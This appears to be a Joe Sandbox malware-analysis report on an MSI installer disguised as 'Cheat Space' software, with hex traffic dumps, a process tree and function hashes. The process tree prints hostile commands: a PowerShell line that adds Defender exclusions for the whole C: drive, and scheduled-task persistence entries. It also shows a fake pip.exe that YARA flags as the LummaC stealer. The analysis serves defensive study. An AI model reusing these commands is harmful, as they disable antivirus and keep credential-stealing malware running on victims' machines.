,57,65,cb,74,82,79,14b,6b,d2,5f,67,62,3c,b3,95,5a,6d,55,81,7b,34,32,41,51,69,7f,65,58,46,8e,64,79,6b,8d,98,6e,a8,60,68,105,7a,70,94,15b,38,6c,15b,9a,6d,51,a1,43,34,74,6c,5a,8b,ad,117,8c,9e,4c,4f,10a,69,65,5e,147,83,76,52,6b,54,9c,92,6b,60,53,9a,69,a6,5f,8
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 2c 36 30 2c 36 63 2c 63 63 2c 34 66 2c 33 38 2c 33 39 2c 38 62 2c 34 64 2c 38 37 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 38 2c 39 35 2c 35 34 2c 36 64 2c 39 37 2c 36 36 2c 33 38 2c 37 62 2c 37 34 2c 35 61 2c 36 64 2c 35 61 2c 37 37 2c 34 33 2c 34 35 2c 35 64 2c 34 61 2c 37 39 2c 66 35 2c 31 30 65 2c 36 61 2c 62 62 2c 35 61 2c 34 65 2c 64 33 2c 39 36 2c 35 39 2c 37 63 2c 31 32 61 2c 34 65 2c 39 34 2c 38 66 2c 35 32 2c 36 62 2c 35 61 2c 63 63 2c 39 36 2c 36 33 2c 33 38 2c 62 34 2c 66 32 2c 36 34 2c 36 64 2c 34 62 2c 37 62 2c 36 62 2c 37 38 2c 33 32 2c 34 31 2c 35 37 2c 38 62 2c 39 61 2c 36 35 2c 35 38 2c 34 63 2c 34 33 2c 34 30 2c 65 34 2c 34 63 2c 34 66 2c 33 31 2c 36 39 2c 37 36 2c 38 34 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 64 2c 38 63 2c 33 38 2c Data Ascii: ,60,6c,cc,4f,38,39,8b,4d,87,31,4e,6c,4c,58,95,54,6d,97,66,38,7b,74,5a,6d,5a,77,43,45,5d,4a,79,f5,10e,6a,bb,5a,4e,d3,96,59,7c,12a,4e,94,8f,52,6b,5a,cc,96,63,38,b4,f2,64,6d,4b,7b,6b,78,32,41,57,8b,9a,65,58,4c,43,40,e4,4c,4f,31,69,76,84,52,6b,54,5a,6d,8c,38,
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 2c 35 37 2c 65 62 2c 38 39 2c 36 62 2c 39 32 2c 31 35 31 2c 35 64 2c 36 32 2c 33 39 2c 37 30 2c 34 33 2c 39 31 2c 35 63 2c 35 37 2c 39 34 2c 31 32 30 2c 64 30 2c 62 31 2c 39 32 2c 36 65 2c 37 64 2c 66 63 2c 35 65 2c 35 61 2c 61 31 2c 31 35 33 2c 38 33 2c 37 35 2c 37 37 2c 34 33 2c 33 34 2c 39 34 2c 36 63 2c 35 61 2c 38 62 2c 62 37 2c 65 31 2c 37 30 2c 38 35 2c 34 63 2c 34 66 2c 31 30 61 2c 36 39 2c 36 35 2c 35 65 2c 31 34 37 2c 31 36 61 2c 35 35 2c 35 32 2c 36 62 2c 37 63 2c 39 36 2c 36 37 2c 36 32 2c 34 32 2c 36 65 2c 37 34 2c 35 61 2c 36 64 2c 35 65 2c 61 37 2c 34 36 2c 33 34 2c 34 65 2c 34 31 2c 35 31 2c 36 33 2c 36 35 2c 36 35 2c 35 38 2c 35 37 2c 36 33 2c 34 32 2c 39 38 2c 36 31 2c 31 32 37 2c 62 30 2c 38 37 2c 38 30 2c 36 32 2c 65 63 2c 39 31 2c 36 Data Ascii: ,57,eb,89,6b,92,151,5d,62,39,70,43,91,5c,57,94,120,d0,b1,92,6e,7d,fc,5e,5a,a1,153,83,75,77,43,34,94,6c,5a,8b,b7,e1,70,85,4c,4f,10a,69,65,5e,147,16a,55,52,6b,7c,96,67,62,42,6e,74,5a,6d,5e,a7,46,34,4e,41,51,63,65,65,58,57,63,42,98,61,127,b0,87,80,62,ec,91,6
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 2c 31 36 64 2c 35 61 2c 36 66 2c 37 33 2c 31 30 33 2c 35 38 2c 33 34 2c 33 38 2c 34 62 2c 38 39 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 63 2c 36 32 2c 33 39 2c 37 30 2c 34 33 2c 62 31 2c 35 63 2c 35 37 2c 39 34 2c 31 32 66 2c 35 32 2c 39 38 2c 62 32 2c 36 65 2c 37 64 2c 66 63 2c 35 65 2c 35 61 2c 61 31 2c 31 35 33 2c 36 64 2c 34 64 2c 37 61 2c 36 62 2c 63 31 2c 34 37 2c 34 31 2c 35 37 2c 36 33 2c 37 66 2c 36 35 2c 35 38 2c 34 36 2c 61 32 2c 36 34 2c 37 39 2c 36 62 2c 61 32 2c 31 31 35 2c 62 37 2c 62 35 2c 36 30 2c 36 38 2c 31 30 35 2c 37 61 2c 37 30 2c 39 34 2c 31 35 62 2c 33 61 2c 62 66 2c 38 31 2c 35 61 2c 36 64 2c 34 66 2c 61 66 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 37 62 2c 36 33 2c 61 66 2c 39 30 2c 36 31 2c 36 65 2c 65 39 2c 31 31 31 2c 63 63 2c Data Ascii: ,16d,5a,6f,73,103,58,34,38,4b,89,63,55,65,58,4c,62,39,70,43,b1,5c,57,94,12f,52,98,b2,6e,7d,fc,5e,5a,a1,153,6d,4d,7a,6b,c1,47,41,57,63,7f,65,58,46,a2,64,79,6b,a2,115,b7,b5,60,68,105,7a,70,94,15b,3a,bf,81,5a,6d,4f,af,43,34,32,41,7b,63,af,90,61,6e,e9,111,cc,
2023-12-03 16:22:55 UTC	1369	IN	Data Raw: 63 2c 33 38 2c 39 65 2c 39 66 2c 36 33 2c 39 35 2c 36 37 2c 64 33 2c 37 38 2c 39 36 2c 34 36 2c 35 37 2c 65 62 2c 38 39 2c 36 62 2c 39 32 2c 31 35 31 2c 34 38 2c 33 62 2c 62 36 2c 38 30 2c 34 33 2c 34 66 2c 33 35 2c 37 38 2c 36 63 2c 35 66 2c 38 32 2c 36 65 2c 35 34 2c 37 37 2c 36 37 2c 36 32 2c 33 38 2c 35 39 2c 37 34 2c 35 61 2c 37 65 2c 37 36 2c 38 30 2c 36 62 2c 66 39 2c 31 30 32 2c 61 36 2c 61 66 2c 37 37 2c 36 62 2c 66 66 2c 37 65 2c 35 63 2c 36 35 2c 31 33 32 2c 37 30 2c 34 35 2c 37 37 2c 63 35 2c 36 33 2c 36 63 2c 35 32 2c 35 63 2c 61 33 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 65 2c 36 65 2c 37 34 2c 35 61 2c 36 64 2c 61 64 2c 61 32 2c 34 63 2c 35 63 2c 34 31 2c 37 36 2c 62 66 2c 61 66 2c 36 39 2c 37 62 2c 66 32 2c 36 63 2c 34 65 2c 36 36 2c 31 Data Ascii: c,38,9e,9f,63,95,67,d3,78,96,46,57,eb,89,6b,92,151,48,3b,b6,80,43,4f,35,78,6c,5f,82,6e,54,77,67,62,38,59,74,5a,7e,76,80,6b,f9,102,a6,af,77,6b,ff,7e,5c,65,132,70,45,77,c5,63,6c,52,5c,a3,54,5a,67,62,3e,6e,74,5a,6d,ad,a2,4c,5c,41,76,bf,af,69,7b,f2,6c,4e,66,1

Target ID:	0
Start time:	17:22:02
Start date:	03/12/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\BpOyVCAP8g.msi"
Imagebase:	0x7ff7b7f10000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:22:02
Start date:	03/12/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7b7f10000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	17:22:03
Start date:	03/12/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding F9CAFE3F9A48CCB4B30A0F2636E9E573 C
Imagebase:	0x460000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:22:07
Start date:	03/12/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding D98E007001F77D35A61097C7682AE837
Imagebase:	0x460000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:22:08
Start date:	03/12/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1BB4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1BA1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1BA2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1BA3.txt" -propSep " :<->: " -testPrefix "_testValue."
Imagebase:	0x240000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:22:08
Start date:	03/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:22:09
Start date:	03/12/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
Imagebase:	0x240000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:22:13
Start date:	03/12/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding AD2F0FCC6D57BB9B2DA85CD9D490BCDB E Global\MSI0000
Imagebase:	0x7ff7699e0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:22:13
Start date:	03/12/2023
Path:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Imagebase:	0x7ff677df0000
File size:	893'984 bytes
MD5 hash:	9C3C6C6A9AE84C33D6A09F4FB5E319CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:22:16
Start date:	03/12/2023
Path:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Imagebase:	0x7ff677df0000
File size:	893'984 bytes
MD5 hash:	9C3C6C6A9AE84C33D6A09F4FB5E319CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:22:52
Start date:	03/12/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /sc daily /st 12:11 /f /tn BrowserHistoryCheck_NzI4 /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	17:22:52
Start date:	03/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:22:52
Start date:	03/12/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /sc daily /st 12:11 /f /tn "LuaJIT" /tr ""C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua""
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	17:22:53
Start date:	03/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:22:55
Start date:	03/12/2023
Path:	C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
Imagebase:	0x7ff720b70000
File size:	893'984 bytes
MD5 hash:	9C3C6C6A9AE84C33D6A09F4FB5E319CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 3%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:23:03
Start date:	03/12/2023
Path:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Imagebase:	0x7ff677df0000
File size:	893'984 bytes
MD5 hash:	9C3C6C6A9AE84C33D6A09F4FB5E319CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:23:12
Start date:	03/12/2023
Path:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua
Imagebase:	0x7ff677df0000
File size:	893'984 bytes
MD5 hash:	9C3C6C6A9AE84C33D6A09F4FB5E319CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:24:02
Start date:	03/12/2023
Path:	C:\Users\user\AppData\Roaming\Python\pip.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Python\pip.exe
Imagebase:	0xae0000
File size:	1'078'604'841 bytes
MD5 hash:	10E79FCE9DAB731BA85B31A3F7C7EBA3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Source: 00000016.00000002.2911728901.00000000048CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Source: 00000016.00000002.2940934854.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Source: 00000016.00000002.2909869210.00000000035D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Source: 00000016.00000002.2911728901.00000000049F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	17:24:03
Start date:	03/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x380000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	17:24:04
Start date:	03/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x820000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Source: 00000018.00000002.2881383590.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	17:24:04
Start date:	03/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 1348
Imagebase:	0xe10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Has exited:	false

Show Windows behavior

Function 04778478 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732762203.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0120231b514b6772db9a9e7c76b6b142f3b8ac7e56e36e23a1a72250afa54a08
Instruction ID: b1dde491ae8ffa283479161189b850c83e3a452f57f7ee709046d4f8b42ebdf0
Opcode Fuzzy Hash: 0120231b514b6772db9a9e7c76b6b142f3b8ac7e56e36e23a1a72250afa54a08
Instruction Fuzzy Hash: 63A19135A002488FDF14EFE5C588AADBBF6FF84340F564558E406AB365DB38AC49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04778BC8 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732762203.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8216815871547ca32415bae577250584e6307772ea8cf8ed30f28c010af873
Instruction ID: b5f35dcb661d82b1334001e72dbd605132100ee1132660daaff96f2a67f30a88
Opcode Fuzzy Hash: ac8216815871547ca32415bae577250584e6307772ea8cf8ed30f28c010af873
Instruction Fuzzy Hash: A871E070A002498FCB14DF68C884A9EBBF6FF89310F15896AE405DB351EB71AC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04778D36 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732762203.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd93889b3edab7e72724ad90808c4383f565f9f829274dfed38fd6b4ba28ad37
Instruction ID: 5fbe92d247c6195e6c5f00fb46bc394daca565f2bcfe70d6c9ee65f07e616920
Opcode Fuzzy Hash: bd93889b3edab7e72724ad90808c4383f565f9f829274dfed38fd6b4ba28ad37
Instruction Fuzzy Hash: 60715B70A002099FDF14EFB5D484BADBBF6BF88304F558429E416AB390DB74AD4ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 04778959 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732762203.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb3fd3d95bb1c0c5168f569c6cca0d080d71e66d14e46869fd51af892f288b9
Instruction ID: 5999bbd9748a6c28f73fcdfc23b807fdc9eb1a41cf8624326de1a814c8c96d5c
Opcode Fuzzy Hash: ebb3fd3d95bb1c0c5168f569c6cca0d080d71e66d14e46869fd51af892f288b9
Instruction Fuzzy Hash: 5F51DE717002048FDB14EF34C898AAE7BB6EF89754F095569E506EB3A0DF74AC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04778BB3 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732762203.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d3aab7a44cc832e9d0012ec151d2d64d3b855cd77777e4556425c23c8025ad8
Instruction ID: 8ca01a22bf72e7a2c47dcf0c52c50cc5dfd357c7863cb4da1144323e37076d4d
Opcode Fuzzy Hash: 0d3aab7a44cc832e9d0012ec151d2d64d3b855cd77777e4556425c23c8025ad8
Instruction Fuzzy Hash: 6E417F70A006498FDB14EFA9C48879DBBF6FF89300F55846DD006AB790EBB4AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0466D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732459260.000000000466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0466D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_466d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c40e62c9380a0acefe2f5ff6140268fdb6cea9bd77ad9fdba1972549ff610c
Instruction ID: 2bd3c29ec25b09f6c1929a27481cf9e68c280af22190d817768bee213c06c6b3
Opcode Fuzzy Hash: f2c40e62c9380a0acefe2f5ff6140268fdb6cea9bd77ad9fdba1972549ff610c
Instruction Fuzzy Hash: 6101DB71605340EAE7208E16EC84B67BFA8DF55324F18C51AED4A4F242E279A846C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0466D006 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732459260.000000000466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0466D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_466d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aea5185dab652383fb0f8f45eff032b8f98e3470b3bd0cf38313d0f870f442d
Instruction ID: eeeb33fcdf82af2969b3576b880b273f6a669f4cfc94e49e329ea59b7e1479c5
Opcode Fuzzy Hash: 4aea5185dab652383fb0f8f45eff032b8f98e3470b3bd0cf38313d0f870f442d
Instruction Fuzzy Hash: C101526210E3C0AFD7128B259894B52BFB4DF53224F1981DBD9888F293C2695845C772

Uniqueness

Uniqueness Score: -1.00%

Function 047788ED Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1732762203.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3921eb35cef46f19c0471edb4949c32aa5d7bddabfb765e75adc637a0813fc6f
Instruction ID: f3afae0cffab90660ee44fc41efc128c566e1d3568f1babd53996d012388b51e
Opcode Fuzzy Hash: 3921eb35cef46f19c0471edb4949c32aa5d7bddabfb765e75adc637a0813fc6f
Instruction Fuzzy Hash: 40F0A770700606CFDB00DBA5C095B6E37B1EF44340F104814D1029F394DB78AD488FC1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7792, Parent PID: 7660COMMON

Executed Functions

Function 04E0B728 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed362615330f7be6845f21e1916a4c879d0fdf88a72c83b1621c0ac17cba6cf
Instruction ID: 55a5931c143fb4bf33c35842110f317cb527e99652cfdf187491e6b89ad5986d
Opcode Fuzzy Hash: 4ed362615330f7be6845f21e1916a4c879d0fdf88a72c83b1621c0ac17cba6cf
Instruction Fuzzy Hash: 5F9191B0B006085BEF19EFB494115AE7BF2EFC4600B00D96CD516AB390DF786E069BD5

Uniqueness

Uniqueness Score: -1.00%

Function 04E0B738 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 282f7fdfa974ae32e463a2d1cec07fc982de429898e45bd5cac06ada405c27fd
Instruction ID: 8b48a05a49b624a2eba3705ced02c2812a594dee2be714a771e8d51883bd95e4
Opcode Fuzzy Hash: 282f7fdfa974ae32e463a2d1cec07fc982de429898e45bd5cac06ada405c27fd
Instruction Fuzzy Hash: A59181B0B006199BEF19EFB484115AE7BF2EFC4600B40D92CD516AB390DF786E069BD5

Uniqueness

Uniqueness Score: -1.00%

Function 07932308 Relevance: 17.0, Strings: 13, Instructions: 779COMMON

Download Yara Rule

Strings

4'tq, xrefs: 0793260D
4'tq, xrefs: 07932BDB
4'tq, xrefs: 07932BE7
J5l, xrefs: 0793259E
#$k, xrefs: 07932BA7
r4l, xrefs: 0793254F
r4l, xrefs: 07932559
4'tq, xrefs: 07932619
J5l, xrefs: 0793237F
J5l, xrefs: 079325EA
J5l, xrefs: 079323C5
J5l, xrefs: 079325F6
J5l, xrefs: 079323D1

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: 4'tq$4'tq$4'tq$4'tq$#$k$J5l$J5l$J5l$J5l$J5l$J5l$r4l$r4l
API String ID: 0-2360556728
Opcode ID: 7d80354781cc7505a9e8de7b7bed04f64c2465fcbcd5e8f9cb9e28754fa8ba35
Instruction ID: 8128c5a5e605bed0ec1ab8913dc11ceaa911434a9662eb0b479be6f4d3717a38
Opcode Fuzzy Hash: 7d80354781cc7505a9e8de7b7bed04f64c2465fcbcd5e8f9cb9e28754fa8ba35
Instruction Fuzzy Hash: 90427AB5B0420A8FDB259F7984016ABBBF6BF89318F14847AD905CF241DB35DD41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 07934048 Relevance: 5.6, Strings: 4, Instructions: 580COMMON

Download Yara Rule

Strings

4'tq, xrefs: 07934386
4'tq, xrefs: 07934390
4'tq, xrefs: 079344E0
4'tq, xrefs: 079344EA

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

